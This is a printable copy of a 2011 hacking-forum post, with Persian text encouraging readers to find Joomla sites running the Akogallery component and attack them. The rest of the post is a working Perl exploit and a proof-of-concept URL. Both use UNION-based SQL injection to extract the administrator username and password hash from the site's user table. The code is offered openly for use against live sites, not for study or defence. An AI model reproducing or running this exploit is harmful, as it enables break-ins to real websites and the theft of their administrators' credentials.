Parsi Coders
Joomla Component (Akogallery) Remote SQL Injection - نسخه قابل چاپ

+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+--- موضوع: Joomla Component (Akogallery) Remote SQL Injection (/showthread.php?tid=829)



Joomla Component (Akogallery) Remote SQL Injection - Amin_Mansouri - 08-30-2011

اکسپلویت زیر ریموت sql injection هست بگردید joomla اگر سایتی دیدی از کامپونت Akogallery استفاده کرده میتونید با اکسپلویت زیر یه حالی بهش بدید ...
کد:
#!/usr/bin/perl -w
# Joomla Component (Akogallery) Remote SQL Injection
########################################
#

#     * coded by : D4NB4R

#

#     * Contact: d4nb4r@hotmail.com

#

#     * Greetz :  Xianur0 ; CCT TEAM ; Remoteexecution ; Clubhacker ; E-r00t ; Mitm

########################################
#  P0c: /index.php?option=com_akogallery&Itemid=nice&func=detail&id=-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,1,17,18,19,20,21/**/D4NB4R/**/from/**/mos_users--
########################################
#  exploit aported password crypted maybe is crypted with mysql
#  exploit tatjibe password mcrypt�
########################################
#----------------------------------------------------------------------------#
########################################
# * TITLE:          Perl_akoxploit
# * REQUIREMENTS:   PHP 4 / PHP 5
# * LICENSE:        GNU General Public License
# * FILENAME:       Perl_akoxploit.pl
########################################
#----------------------------------------------------------------------------#
########################################
print "\t\t############################################################\n\n";
print "\t\t#       Joomla Component (akogallery) Remote SQL Injection    #\n\n";
print "\t\t#                        by D4NB4R                            #\n\n";
print "\t\t############################################################\n\n";
########################################
#----------------------------------------------------------------------------#
########################################
use LWP::UserAgent;
die "Example: perl $0 http://www.pinturama.net/path/\n" unless @ARGV;
########################################
#----------------------------------------------------------------------------#
########################################
#the username of  joomla
$user="username";
#the pasword of  joomla
$pass="password";
#the tables of joomla
$tab="mos_users";
#the tables of joomla
#$BUN="hola";
########################################
#----------------------------------------------------------------------------#
########################################
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
########################################
#----------------------------------------------------------------------------#
########################################
$host =$ARGV[0]. "/index.php?option=com_akogallery&func=detail&id=-1/**/union/**/select/**/1,2,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e),4,5,6,7,8,9,10,11,12,13,14/**/from/**/".$tab."--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~ /<user>(.*?)<user>/){
        print "\nBrought to you by DaNBaR...\n";
        print "\n

    * Admin User : $1";

}
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~/<pass>(.*?)<pass>/){print "\n

    * Admin Hash : $1\n\n";

print "\t\t#   Exploit has ben aported user and password hash   #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
########################################
#-------------------Exploit exploited by D4NB4R --------------------#
########################################